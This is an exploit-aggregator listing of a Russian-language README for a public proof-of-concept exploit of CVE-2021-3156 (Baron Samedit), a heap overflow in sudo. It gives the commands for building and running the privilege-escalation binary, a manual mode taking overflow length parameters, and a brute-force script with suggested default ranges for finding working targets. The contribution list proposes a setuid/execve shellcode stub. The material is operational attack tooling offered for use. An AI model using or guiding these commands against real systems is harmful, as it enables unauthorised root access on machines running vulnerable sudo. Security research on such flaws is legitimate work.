Sploitus

Exploit for CVE-2021-3156

kitploit · 2026-08-25

Exploit Code

MARKDOWN75 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-ONEOY-CVE-2021-3156
# CVE-2021-3156 PoC

## Введение

Это эксплойт для уязвимости `CVE-2021-3156` в sudo (названной Baron Samedit компанией Qualys).

## Использование

сборка:

root@kitploit:~
    
    
    $ make
    

список целей:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich
    

запуск:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich <target_number>
    

ручной режим:

root@kitploit:~
    
    
    $ ./sudo-hax-me-a-sandwich <smash_len_a> <smash_len_b> <null_stomp_len> <lc_all_len>
    

## Поиск целей перебором (экспериментально)

Убедитесь, что у вас установлен GNU parallel.

root@kitploit:~
    
    
    $ make brute
    $ ./brute.sh <smash_start> <smash_end> <null_start> <null_end> <lc_start> <lc_end>
    

несколько значений по умолчанию для пробы:

root@kitploit:~
    
    
    $ ./brute.sh 90 120 50 70 150 300
    

Съест все доступные ядра. Не пытайтесь совмещать Netflix и перебор.

## Вклад

Присылайте (разумные) PR — возможно, я их смержу.

Несколько идей:

  * Больше целей
  * Поиск целей
  * Другие стратегии эксплуатации
  * Более автономная функциональность: 
    * Встроить разделяемую библиотеку hax.c (пожалуйста, сделайте её маленькой: ELF-гольф + asm-заглушка setuid/execve)
    * Добавить логику mkdir в hax.c
  * Очистка каталогов/разделяемых библиотек